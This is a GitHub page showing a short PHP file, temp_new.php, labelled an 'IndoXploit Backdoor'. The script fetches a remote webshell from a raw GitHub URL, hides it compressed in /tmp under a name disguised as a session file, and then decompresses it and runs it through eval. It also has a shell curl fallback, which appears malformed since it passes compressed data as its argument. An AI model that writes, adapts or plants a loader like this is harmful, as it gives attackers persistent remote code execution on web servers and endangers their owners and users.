-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathtemp_new.php
More file actions
32 lines (29 loc) · 1.08 KB
/
temp_new.php
File metadata and controls
32 lines (29 loc) · 1.08 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
# IndoXploit Backdoor
# Bypass 406 Not Acceptable & Auto Delete Shell
# Coded by: L0c4lh34rtz - IndoXploit
$URL = 'https://raw.githubusercontent.com/justikail/webshell/main/alfa-new.php'; # Backdoor URL
$TMP = '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'; # dont change this !!
function M() {
$FGT = @gzcompress(gzdeflate(gzcompress(gzdeflate(gzcompress(gzdeflate(file_get_contents($GLOBALS['URL'])))))));
if(!$FGT) {
echo `curl -k $(echo {$GLOBALS[gzcompress]($GLOBALS[gzdeflate]($GLOBALS[gzcompress]($GLOBALS[gzdeflate]($GLOBALS[gzcompress]($GLOBALS[gzdeflate](file_get_contents($GLOBALS['URL'])))))))}) > {$GLOBALS['TMP']}`;
} else {
$HANDLE = fopen($GLOBALS['TMP'], 'w');
fwrite($HANDLE, $FGT);
fclose($HANDLE);
}
echo '<script>window.location="?LOL";</script>';
}
if(file_exists($TMP)) {
if(filesize($TMP) === 0) {
unlink($TMP);
M();
} else {
$B64 = gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(file_get_contents($TMP)))))));
@eval("?>".$B64);
}
} else {
M();
}
?>